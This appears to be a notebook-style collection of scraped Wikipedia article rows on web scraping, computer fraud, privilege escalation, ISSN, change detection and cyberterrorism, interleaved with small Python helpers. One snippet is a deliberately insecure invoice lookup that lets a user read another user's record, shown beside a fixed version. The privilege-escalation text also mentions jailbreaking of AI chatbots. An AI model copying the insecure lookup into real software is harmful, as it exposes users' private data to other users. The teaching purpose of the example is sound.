Web Application Firewalls LoadBalancers: Others: |
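The firewall article above is mostly history, but its practical upshot for this notebook is that web application firewalls often throttle or block clients that request pages too aggressively. A scraper that identifies itself and backs off on 403/429 responses is less likely to be filtered. A small sketch, assuming requests; the User-Agent string, retry count, and delays are illustrative assumptions:

import time
import requests

HEADERS = {"User-Agent": "example-research-scraper/0.1 (contact: you@example.com)"}  # placeholder identity

def polite_get(url, max_retries=3, base_delay=5.0):
    """GET a URL with a descriptive User-Agent, backing off when the server
    (or a firewall in front of it) answers 403 or 429."""
    response = None
    for attempt in range(max_retries):
        response = requests.get(url, headers=HEADERS, timeout=10)
        if response.status_code not in (403, 429):
            break
        time.sleep(base_delay * (attempt + 1))  # linear back-off before retrying
    return response

# resp = polite_get("https://en.wikipedia.org/wiki/Application_firewall")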
37 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Web_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
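The row above describes the basic pattern of a web scraper: fetch a page built for human readers, parse its markup, and keep only the useful text or tables. Below is a minimal sketch of that pattern using the same requests/BeautifulSoup/pandas stack installed at the top of this notebook; the example URL, the User-Agent string, and the helper name scrape_page are illustrative placeholders, not something taken from the scraped article.
# Minimal web-scraping sketch of the approach described above.
# The URL and function name are illustrative assumptions.
import requests
import pandas as pd
from bs4 import BeautifulSoup
from io import StringIO

def scrape_page(url):
    # Fetch the page and parse the HTML (html5lib is installed in this notebook)
    response = requests.get(url, headers={"User-Agent": "Mozilla/5.0"}, timeout=15)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")
    # Keep only visible paragraph text, ignoring scripts, styles, and markup
    text = " ".join(p.get_text(" ", strip=True) for p in soup.find_all("p"))
    # Any HTML tables can be lifted straight into DataFrames for later analysis
    tables = pd.read_html(StringIO(response.text)) if "<table" in response.text else []
    return text, tables

# Example (hypothetical target):
# text, tables = scrape_page("https://en.wikipedia.org/wiki/Data_scraping")
# print(text[:300])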
38 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_fraud | Computer fraud is the use of computers, the Internet, Internet devices, and Internet services to defraud people or organizations of resources. 1 In the United States, computer fraud is specifically proscribed by the Computer Fraud and Abuse Act (CFAA), which criminalizes computer-related acts under federal jurisdiction and directly combats the insufficiencies of existing laws. 2 Types of computer fraud include: Phishing, social engineering, viruses, and DDoS attacks are fairly well-known tactics used to disrupt service or gain access to another's network, but this list is not inclusive. The Melissa Virus appeared on thousands of email systems on March 26, 1999. It was disguised in each instance as an important message from a colleague or friend. 4 The virus was designed to send an infected email to the first 50 email addresses on the users’ Microsoft Outlook address book. Each infected computer would infect 50 additional computers, which in turn would infect another 50 computers. The virus proliferated rapidly and exponentially, resulting in substantial interruption and impairment of public communications and services. Many system administrators had to disconnect their computer systems from the Internet. Companies such as Microsoft, Intel, Lockheed Martin and Lucent Technologies were forced to shut down their email gateways due to the vast amount of emails the virus was generating. The Melissa virus is the most costly outbreak to date, causing more than $400 million in damages to North American businesses. After an investigation conducted by multiple branches of government and law enforcement, the Melissa Virus Worm was attributed to David L. Smith, a 32 year-old New Jersey programmer, who was eventually charged with computer fraud. 5 Smith was one of the first people ever to be prosecuted for the act of writing a virus. He was sentenced to 20 months in federal prison and was fined $5,000. In addition, he was also ordered to serve three years of supervised release after completion of his prison sentence. The investigation involved members of New Jersey State Police High Technology Crime Unit, the Federal Bureau of Investigation (FBI), the Justice Department’s Computer Crime and Intellectual Property Section, and the Defense Criminal Investigative Service. |
39 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Privilege_escalation | Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application or user with more privileges than intended by the application developer or system administrator can perform unauthorized actions. Most computer systems are designed for use with multiple user accounts, each of which has abilities known as privileges. Common privileges include viewing and editing files or modifying system files. Privilege escalation means users receive privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms: This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations. In some cases, a high-privilege application assumes that it would only be provided with input matching its interface specification, thus doesn't validate this input. Then, an attacker may be able to exploit this assumption, in order to run unauthorized code with the application's privileges: In computer security, jailbreaking is defined as the act of removing limitations that a vendor attempted to hard-code into its software or services. 2 A common example is the use of toolsets to break out of a chroot or jail in UNIX-like operating systems 3 or bypassing digital rights management (DRM). In the former case, it allows the user to see files outside of the filesystem that the administrator intends to make available to the application or user in question. In the context of DRM, this allows the user to run arbitrarily defined code on devices with DRM as well as break out of chroot-like restrictions. The term originated with the iPhone iOS jailbreaking community and has also been used as a term for PlayStation Portable hacking; these devices have repeatedly been subject to jailbreaks, allowing the execution of arbitrary code, and sometimes have had those jailbreaks disabled by vendor updates. iOS systems including the iPhone, iPad, and iPod Touch have been subject to iOS jailbreaking efforts since they were released, and continuing with each firmware update. 4 5 iOS jailbreaking tools include the option to install package frontends such as Cydia and Installer.app, third-party alternatives to the App Store, as a way to find and install system tweaks and binaries. To prevent iOS jailbreaking, Apple has made the device boot ROM execute checks for SHSH blobs in order to disallow uploads of custom kernels and prevent software downgrades to earlier, jailbreakable firmware. In an "untethered" jailbreak, the iBoot environment is changed to execute a boot ROM exploit and allow submission of a patched low level bootloader or hack the kernel to submit the jailbroken kernel after the SHSH check. A similar method of jailbreaking exists for S60 Platform smartphones, where utilities such as HelloOX allow the execution of unsigned code and full access to system files. 
6 7 or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) 8 to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorized jailbreaking, in a manner similar to Apple. In the case of gaming consoles, jailbreaking is often used to execute homebrew games. In 2011, Sony, with assistance from law firm Kilpatrick Stockton, sued 21 year-old George Hotz and associates of the group fail0verflow for jailbreaking the PlayStation 3 (see Sony Computer Entertainment America v. George Hotz and PlayStation Jailbreak). Jailbreaking can also occur in systems and software that use generative artificial intelligence models, such as ChatGPT. In jailbreaking attacks on artificial intelligence systems, users are able to manipulate the model to behave differently than it was programmed, making it possible to reveal information about how the model was instructed and induce it to respond in an anomalous or harmful way. 9 10 Android phones can be officially rooted by either going through manufacturers controlled process, using an exploit to gain root, or flashing custom recovery. Manufacturers allow rooting through a process they control, while some allow the phone to be rooted simply by pressing specific key combinations at boot time, or by other self-administered methods. Using a manufacturers method almost always factory resets the device, making rooting useless to people who want to view the data, and also voids the warranty permanently, even if the device is derooted and reflashed. Software exploits commonly either target a root-level process that is accessible to the user, by using an exploit specific to the phone's kernel, or using a known Android exploit that has been patched in newer versions; by not upgrading the phone, or intentionally downgrading the version. Operating systems and users can use the following strategies to reduce the risk of privilege escalation: Recent research has shown what can effectively provide protection against privilege escalation attacks. These include the proposal of the additional kernel observer (AKO), which specifically prevents attacks focused on OS vulnerabilities. Research shows that AKO is in fact effective against privilege escalation attacks. 13 Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from an application or user. The result is that the application performs actions with the same user but different security context than intended by the application developer or system administrator; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users). Compared to the vertical privilege escalation, horizontal requires no upgrading the privilege of accounts. It often relies on the bugs in the system. 14 This problem often occurs in web applications. Consider the following example: This malicious activity may be possible due to common web application weaknesses or vulnerabilities. Potential web application vulnerabilities or situations that may lead to this condition include: |
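The row above ends by noting that horizontal privilege escalation often appears in web applications where an authenticated user can reach another user's resources. As a hedged illustration only (the record store, function names, and invoice example are hypothetical, not from the article), the sketch below contrasts an unchecked object lookup with one that re-verifies ownership against the session user:
# Hedged sketch of horizontal privilege escalation in a web application.
# All names and data here are hypothetical.
RECORDS = {
    101: {"owner": "alice", "body": "Alice's invoice"},
    102: {"owner": "bob",   "body": "Bob's invoice"},
}

def get_invoice_insecure(session_user, invoice_id):
    # Vulnerable: trusts the ID supplied by the client, so Alice can read
    # Bob's invoice simply by changing the number in her request.
    return RECORDS[invoice_id]["body"]

def get_invoice_secure(session_user, invoice_id):
    # Mitigation: re-check ownership against the authenticated session before
    # returning the record, blocking the horizontal escalation.
    record = RECORDS.get(invoice_id)
    if record is None or record["owner"] != session_user:
        raise PermissionError("access denied")
    return record["body"]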
40 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/ISSN_(identifier) | An International Standard Serial Number (ISSN) is an eight-digit serial number used to uniquely identify a serial publication (periodical), such as a magazine. 1 The ISSN is especially helpful in distinguishing between serials with the same title. ISSNs are used in ordering, cataloging, interlibrary loans, and other practices in connection with serial literature. 2 The ISSN system was first drafted as an International Organization for Standardization (ISO) international standard in 1971 and published as ISO 3297 in 1975. 3 ISO subcommittee TC 46/SC 9 is responsible for maintaining the standard. When a serial with the same content is published in more than one media type, a different ISSN is assigned to each media type. For example, many serials are published both in print and electronic media. The ISSN system refers to these types as print ISSN (p-ISSN) and electronic ISSN (e-ISSN). 4 Consequently, as defined in ISO 3297:2007, every serial in the ISSN system is also assigned a linking ISSN (ISSN-L), typically the same as the ISSN assigned to the serial in its first published medium, which links together all ISSNs assigned to the serial in every medium. 5 An ISSN is an eight-digit code, divided by a hyphen into two four-digit numbers. 1 The last digit, which may be zero through nine or an X, is a check digit, so the ISSN is uniquely represented by its first seven digits. Formally, the general form of the ISSN (also named "ISSN structure" or "ISSN syntax") can be expressed as NNNN-NNNC, 6 where N is a decimal digit character in the set {0, 1, 2, ..., 9} and C is in {0, 1, 2, ..., 9, X}; it can also be expressed as a Perl Compatible Regular Expressions (PCRE) regular expression. For example, the ISSN of the journal Hearing Research is 0378-5955, where the final 5 is the check digit, that is, C = 5. To calculate the check digit, the following algorithm may be used: multiply the first seven digits by the weights 8 through 2 and sum the products, 0×8 + 3×7 + 7×6 + 8×5 + 5×4 + 9×3 + 5×2 = 0 + 21 + 42 + 40 + 20 + 27 + 10 = 160. The remainder of this sum modulo 11 is then calculated: 160 = 14×11 + 6, so the remainder is 6. If there is no remainder, the check digit is 0; otherwise the remainder is subtracted from 11. If the result is less than 10, it yields the check digit: 11 - 6 = 5. Thus, in this example, the check digit C is 5. To confirm the check digit, calculate the sum of all eight digits of the ISSN multiplied by their position in the number, counting from the right. (If the check digit is X, add 10 to the sum.) The remainder of the sum modulo 11 must be 0. There is an online ISSN checker that can validate an ISSN, based on the above algorithm. 7 ISSNs can be encoded in EAN-13 bar codes with a 977 "country code" (compare the 978 country code ("bookland") for ISBNs), followed by the 7 main digits of the ISSN (the check digit is not included), followed by 2 publisher-defined digits, followed by the EAN check digit (which need not match the ISSN check digit). 8 ISSN codes are assigned by a network of ISSN National Centres, usually located at national libraries and coordinated by the ISSN International Centre based in Paris. The International Centre is an intergovernmental organization created in 1974 through an agreement between UNESCO and the French government. 
ISSN-L is a unique identifier for all versions of the serial containing the same content across different media. As defined by ISO 3297:2007, the "linking ISSN (ISSN-L) provides a mechanism for collocation or linking among the different media versions of the same continuing resource. The ISSN-L is one of a serial's existing ISSNs, so does not change the use or assignment of "ordinary" ISSNs; 9 it is based on the ISSN of the first published medium version of the publication. If the print and online versions of the publication are published at the same time, the ISSN of the print version is chosen as the basis of the ISSN-L. With ISSN-L is possible to designate one single ISSN for all those media versions of the title. The use of ISSN-L facilitates search, retrieval and delivery across all media versions for services like OpenURL, library catalogues, search engines or knowledge bases. The International Centre maintains a database of all ISSNs assigned worldwide, the ISDS Register (International Serials Data System), otherwise known as the ISSN Register. At the end of 2016, update the ISSN Register contained records for 1,943,572 items. 10 The Register is not freely available for interrogation on the web, but is available by subscription. ISSN and ISBN codes are similar in concept, where ISBNs are assigned to individual books. An ISBN might be assigned for particular issues of a serial, in addition to the ISSN code for the serial as a whole. An ISSN, unlike the ISBN code, is an anonymous identifier associated with a serial title, containing no information as to the publisher or its location. For this reason a new ISSN is assigned to a serial each time it undergoes a major title change. Since the ISSN applies to an entire serial, other identifiers have been built on top of it to allow references to specific volumes, articles, or other identifiable components (like the table of contents): the Publisher Item Identifier (PII) and the Serial Item and Contribution Identifier (SICI). Separate ISSNs are needed for serials in different media (except reproduction microforms). Thus, the print and electronic media versions of a serial need separate ISSNs, 11 and CD-ROM versions and web versions require different ISSNs. However, the same ISSN can be used for different file formats (e.g. PDF and HTML) of the same online serial. This "media-oriented identification" of serials made sense in the 1970s. In the 1990s and onward, with personal computers, better screens, and the Web, it makes sense to consider only content, independent of media. This "content-oriented identification" of serials was a repressed demand during a decade, but no ISSN update or initiative occurred. A natural extension for ISSN, the unique-identification of the articles in the serials, was the main demand application. An alternative serials' contents model arrived with the indecs Content Model and its application, the digital object identifier (DOI), an ISSN-independent initiative, consolidated in the 2000s. Only later, in 2007, ISSN-L was defined in the new ISSN standard (ISO 3297:2007) as an "ISSN designated by the ISSN Network to enable collocation or versions of a continuing resource linking among the different media". 12 An ISSN can be encoded as a uniform resource name (URN) by prefixing it with "urn:ISSN: . 6 For example, Rail could be referred to as "urn:ISSN:0953 4563". URN namespaces are case-sensitive, and the ISSN namespace is all caps. 13 If the checksum digit is "X" then it is always encoded in uppercase in a URN. 
The URNs are content-oriented, but ISSN is media-oriented: A unique URN for serials simplifies the search, recovery and delivery of data for various services including, in particular, search systems and knowledge databases. 12 ISSN-L (see Linking ISSN above) was created to fill this gap. The two standard categories of media in which serials are most available are print and electronic. In metadata contexts (e.g., JATS), these may have standard labels. p-ISSN is a standard label for "Print ISSN", the ISSN for the print media (paper) version of a serial. Usually it is the "default media" and so the "default ISSN". e-ISSN (or eISSN) is a standard label for "Electronic ISSN", the ISSN for the electronic media (online) version of a serial. 15 |
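The check-digit algorithm described in the ISSN row above maps directly onto a few lines of Python. The sketch below follows the rules stated there (weights 8 through 2 for the first seven digits, remainder modulo 11, X standing for 10, and the position-weighted confirmation sum), using the Hearing Research example from the text; the function names are my own.
# Sketch of the ISSN check-digit algorithm described above.
import re

def issn_check_digit(first_seven):
    # Multiply the first seven digits by weights 8, 7, ..., 2 and sum
    total = sum(int(d) * w for d, w in zip(first_seven, range(8, 1, -1)))
    remainder = total % 11
    if remainder == 0:
        return "0"
    value = 11 - remainder
    return "X" if value == 10 else str(value)

def is_valid_issn(issn):
    # Syntax check: four digits, hyphen, three digits, then a digit or X
    if not re.fullmatch(r"[0-9]{4}-[0-9]{3}[0-9X]", issn):
        return False
    digits = issn.replace("-", "")
    # Confirmation rule from the text: weight each of the eight characters by
    # its position counting from the right (X counts as 10); sum mod 11 must be 0
    values = [10 if c == "X" else int(c) for c in digits]
    return sum(v * pos for v, pos in zip(values, range(8, 0, -1))) % 11 == 0

# issn_check_digit("0378595") returns "5"; is_valid_issn("0378-5955") returns True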
41 | https://en.wikipedia.org/wiki/Web_scraping | https://www.worldcat.org/issn/0148-2963 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
42 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Change_detection_and_notification | Change detection and notification (CDN) is the automatic detection of changes made to World Wide Web pages and notification to interested users by email or other means. 1 Whereas search engines are designed to find web pages, CDN systems are designed to monitor changes to web pages. Before change detection and notification, it was necessary for users to manually check for web page changes, either by revisiting web sites or periodically searching again. Efficient and effective change detection and notification is hampered by the fact that most servers do not accurately track content changes through Last-Modified or ETag web-server headers. In 2019 a comprehensive analysis regarding CDN systems was published. In 1996, NetMind developed the first change detection and notification tool, known as Mind-it, which ran for six years. This spawned new services such as ChangeDetection (1999), ChangeDetect (2002), Google Alerts (2003), and Versionista (2007) which was used by the John McCain 2008 presidential campaign in the race for the 2008 United States presidential election. 2 Historically, change polling has been done either by a server which sent email notifications or a desktop program which audibly alerted the user to a change. Change alerting is also possible directly to mobile devices and through push notifications, webhooks and HTTP callbacks for application integration. Monitoring options vary by service or product and range from monitoring a single web page at a time to entire web sites. What is actually monitored also varies by service or product with the possibilities of monitoring text, links, documents, scripts, images or screen shots. With the notable exception of Google's patent filings related to Google Alerts, intellectual property activity by change detection and notification vendors is minimal. 3 No one vendor has successfully leveraged exclusive rights to change detection and notification technology through patents or other legal means. citation needed This has resulted in significant functional overlap between products and services. Change detection and notification services can be categorized by the software architecture they use. Three principal approaches can be distinguished: A server polls content, tracks changes and logs data, sending alerts in the form of email notifications, webhooks, RSS. Typically, an associated website with a configuration is managed by the user. Some services also have a mobile device application which connects to a cloud server and provides alerts to the mobile device. A relatively newer approach, which lays between server-based and client-based is to use self-hosting, where the software which would normally run on a separate server runs on your own hardware locally, generally means that the software provides a miniature web server with a browser interface instead of a classic graphical user interface provided by an application. A local client application with a graphical user interface polls content, tracks changes and logs data. Client applications can be browser extensions, mobile apps or programs. Some web pages change regularly, due to the inclusion of adverts or feeds in the presented page. This can trigger false-positives in the change-detection, since users are often only interested in changes to the main content. Some approaches to mitigate this issue exist. |
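The change detection and notification row above describes the polling idea: revisit a page on a schedule and alert when its content differs from the last visit. As a minimal client-side sketch only (the URL, interval, and use of a text hash are assumptions, not how any particular CDN product works), one can fingerprint the extracted text and compare fingerprints across polls:
# Minimal polling sketch of change detection; URL and interval are placeholders.
import hashlib
import time
import requests
from bs4 import BeautifulSoup

def page_fingerprint(url):
    html = requests.get(url, timeout=15).text
    # Hash only the extracted text so cosmetic markup changes (ads, scripts)
    # are less likely to trigger false positives
    text = BeautifulSoup(html, "html5lib").get_text(" ", strip=True)
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def watch(url, interval_seconds=3600):
    last = page_fingerprint(url)
    while True:
        time.sleep(interval_seconds)
        current = page_fingerprint(url)
        if current != last:
            print(f"Change detected at {url}")  # or send an email/webhook here
            last = current

# watch("https://example.com/press-releases", interval_seconds=1800)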
43 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cyberterrorism | Cyberterrorism is the use of the Internet to conduct violent acts that result in, or threaten, the loss of life or significant bodily harm, in order to achieve political or ideological gains through threat or intimidation. Emerging alongside the development of information technology, 1 cyberterrorism involves acts of deliberate, large-scale disruption of computer networks, especially of personal computers attached to the Internet by means of tools such as computer viruses, computer worms, phishing, malicious software, hardware methods, and programming scripts can all be forms of internet terrorism. 2 Some authors opt for a very narrow definition of cyberterrorism, relating to deployment by known terrorist organizations of disruption attacks against information systems for the primary purpose of creating alarm, panic, or physical disruption. Other authors prefer a broader definition, which includes cybercrime. Participating in a cyberattack affects the terror threat perception, even if it isn't done with a violent approach. 3 By some definitions, it might be difficult to distinguish which instances of online activities are cyberterrorism or cybercrime. 4 Cyberterrorism can be also defined as the intentional use of computers, networks, and public internet to cause destruction and harm for personal objectives. Experienced cyberterrorists, who are very skilled in terms of hacking can cause massive damage to government systems and might leave a country in fear of further attacks. 5 The objectives of such terrorists may be political or ideological since this can be considered a form of terror. 6 There is much concern from government and media sources about potential damage that could be caused by cyberterrorism, and this has prompted efforts by government agencies such as the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Central Intelligence Agency (CIA) to put an end to cyber attacks and cyberterrorism. 5 There have been several major and minor instances of cyberterrorism. Al-Qaeda utilized the internet to communicate with supporters and even to recruit new members. 7 Estonia, a Baltic country which is constantly evolving in terms of technology, became a battleground for cyberterrorism in April 2007 after disputes regarding the relocation of a WWII soviet statue located in Estonia's capital Tallinn. 4 There is debate over the basic definition of the scope of cyberterrorism. These definitions can be narrow such as the use of Internet to attack other systems in the Internet that result to violence against persons or property. 8 They can also be broad, those that include any form of Internet usage by terrorists to conventional attacks on information technology infrastructures. 8 There is variation in qualification by motivation, targets, methods, and centrality of computer use in the act. U.S. government agencies also use varying definitions and that none of these have so far attempted to introduce a standard that is binding outside of their sphere of influence. 9 Depending on context, cyberterrorism may overlap considerably with cybercrime, cyberwar or ordinary terrorism. 10 Eugene Kaspersky, founder of Kaspersky Lab, now feels that "cyberterrorism" is a more accurate term than "cyberwar". He states that "with today's attacks, you are clueless about who did it or when they will strike again. It's not cyber-war, but cyberterrorism. 
11 He also equates large-scale cyber weapons, such as the Flame Virus and NetTraveler Virus which his company discovered, to biological weapons, claiming that in an interconnected world, they have the potential to be equally destructive. 11 12 If cyberterrorism is treated similarly to traditional terrorism, then it only includes attacks that threaten property or lives, and can be defined as the leveraging of a target's computers and information, particularly via the Internet, to cause physical, real-world harm or severe disruption of infrastructure. Many academics and researchers who specialize in terrorism studies suggest that cyberterrorism does not exist and is really a matter of hacking or information warfare. 13 They disagree with labeling it as terrorism because of the unlikelihood of the creation of fear, significant physical harm, or death in a population using electronic means, considering current attack and protective technologies. If death or physical damage that could cause human harm is considered a necessary part of the cyberterrorism definition, then there have been few identifiable incidents of cyberterrorism, although there has been much policy research and public concern. Modern terrorism and political violence is not easily defined, however, and some scholars assert that it is now "unbounded" and not exclusively concerned with physical damage. 14 There is an old saying that death or loss of property are the side products of terrorism, the main purpose of such incidents is to create terror in peoples' minds and harm bystanders. If any incident in cyberspace can create terror, it may be rightly called cyberterrorism. For those affected by such acts, the fears of cyberterrorism are quite real. 15 As with cybercrime in general, the threshold of required knowledge and skills to perpetrate acts of cyberterrorism has been steadily diminishing thanks to freely available hacking suites and online courses. 16 Additionally, the physical and virtual worlds are merging at an accelerated rate, making for many more targets of opportunity which is evidenced by such notable cyber attacks as Stuxnet, the Saudi petrochemical sabotage attempt in 2018 and others. 17 Assigning a concrete definition to cyberterrorism can be hard, due to the difficulty of defining the term terrorism itself. Multiple organizations have created their own definitions, most of which are overly quantify broad. There is also controversy concerning overuse of the term, hyperbole in the media and by security vendors trying to sell "solutions". 18 One way of understanding cyberterrorism involves the idea that terrorists could cause massive loss of life, worldwide economic chaos and environmental damage by hacking into critical infrastructure systems. 19 The nature of cyberterrorism covers conduct involving computer or Internet technology that: 20 The term "cyberterrorism" can be used in a variety of different ways, but there are limits to its use. An attack on an Internet business can be labeled cyberterrorism, however when it is done for economic motivations rather than ideological it is typically regarded as cybercrime. 20 Convention also limits the label "cyberterrorism" to actions by individuals, independent groups, or organizations. Any form of cyberwarfare conducted by governments and states would be regulated and punishable under international law. 
20 The Technolytics Institute defines cyberterrorism as "[t]he premeditated use of disruptive activities, or the threat thereof, against computers and/or networks, with the intention to cause harm or further social, ideological, religious, political or similar objectives, or to intimidate any person in furtherance of such objectives." 21 The term appears first in defense literature, surfacing (as "cyber-terrorism") in reports by the U.S. Army War College as early as 1998. 22 The National Conference of State Legislatures, an organization of legislators created to help policymakers in the United States with issues such as economy and homeland security, defines cyberterrorism as "[t]he use of information technology by terrorist groups and individuals to further their agenda. This can include use of information technology to organize and execute attacks against networks, computer systems and telecommunications infrastructures, or for exchanging information or making threats electronically. Examples are hacking into computer systems, introducing viruses to vulnerable networks, web site defacing, denial-of-service attacks, or terroristic threats made via electronic communication." 23 The American Federal Emergency Management Agency defines cyberterrorism as "[t]he illegal threat and the attack against computers, networks, and information stored, where it is carried out to frighten and force the government or its people to achieve political or social objectives." 24 NATO defines cyberterrorism as "a cyberattack using or exploiting computer or communication networks to cause sufficient destruction or disruption to generate fear or to intimidate a society into an ideological goal". 25 The United States National Infrastructure Protection Center defined cyberterrorism as "[a] criminal act perpetrated by the use of computers and telecommunications capabilities resulting in violence, destruction, and/or disruption of services to create fear by causing confusion and uncertainty within a given population, with the goal of influencing a government or population to conform to a political, social, or ideological agenda." 26 The FBI, another United States agency, defines "cyber terrorism" as "premeditated, politically motivated attack against information, computer systems, computer programs, and data which results in violence against non-combatant targets by subnational groups or clandestine agents". 27 These definitions tend to share the view of cyberterrorism as politically and/or ideologically inclined. One area of debate is the difference between cyberterrorism and hacktivism. Hacktivism is "the marriage of hacking with political activism". 28 Both actions are politically driven and involve using computers; however, cyberterrorism is primarily used to cause harm. It becomes an issue because acts of violence on the computer can be labeled as either cyberterrorism or hacktivism. In 1999 the Center for the Study of Terrorism and Irregular Warfare at the Naval Postgraduate School in Monterey, California, defined three levels of cyberterror capability: 29 Cyberterrorism is becoming more and more prominent on social media today. 
30 As the Internet becomes more pervasive, individuals or groups can use the anonymity afforded by cyberspace to threaten other individuals, specific groups (with membership based, for example, on ethnicity or belief), communities and entire countries, without the inherent threat of identification, capture, injury, or death of the attacker that being physically present would bring. Many groups, such as Anonymous, use tools such as denial-of-service attacks to attack and censor groups which oppose them, creating many concerns for freedom and respect for differences of thought. Many believe that cyberterrorism is an extreme threat to countries' economies, and fear an attack could potentially lead to another Great Depression. Several leaders agree that cyberterrorism poses the greatest threat among possible attacks on U.S. territory. Although natural disasters are considered a top threat and have proven to be devastating to people and land, there is ultimately little that can be done to prevent such events from happening. Thus, the expectation is to focus more on preventative measures that will make Internet attacks impossible to execute. As the Internet continues to expand, and computer systems continue to be assigned increased responsibility while becoming more complex and interdependent, sabotage or terrorism via the Internet may become a more serious threat and is possibly one of the top 10 events to "end the human race". 31 People have much easier access to illegal involvement within cyberspace through the ability to access a part of the internet known as the Dark Web. 32 The Internet of Things promises to further merge the virtual and physical worlds, which some experts see as a powerful incentive 